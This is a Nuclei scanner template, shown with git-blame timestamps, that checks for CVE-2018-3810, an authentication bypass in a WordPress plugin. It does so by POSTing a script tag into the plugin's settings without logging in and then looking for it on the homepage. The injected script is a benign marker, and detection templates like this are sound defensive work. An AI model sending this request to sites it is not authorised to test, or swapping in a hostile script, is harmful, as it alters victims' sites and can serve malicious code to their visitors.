2021-03-10 11:36:11 +00:00
|
|
|
id: CVE-2018-3810
|
|
|
|
|
|
|
|
info:
|
2021-03-12 12:02:16 +00:00
|
|
|
name: WordPress Smart Google Code Inserter Authentication Bypass
|
2021-03-10 11:36:11 +00:00
|
|
|
author: princechaddha
|
|
|
|
severity: critical
|
|
|
|
reference: https://www.exploit-db.com/exploits/43420
|
2021-03-18 07:54:36 +00:00
|
|
|
tags: wordpress,cve,cve2018
|
2021-03-10 11:36:11 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: POST
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/wp-admin/options-general.php?page=smartcode"
|
|
|
|
|
|
|
|
body: 'sgcgoogleanalytic=<script>console.log("Nuclei - Open-source project [github.com/projectdiscovery/nuclei]")</script>&sgcwebtools=&button=Save+Changes&action=savegooglecode'
|
2021-03-12 12:02:16 +00:00
|
|
|
headers:
|
2021-03-10 11:36:11 +00:00
|
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "text/html"
|
|
|
|
part: header
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- '<script>console.log("Nuclei - Open-source project [github.com/projectdiscovery/nuclei]")</script>'
|
|
|
|
part: body
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|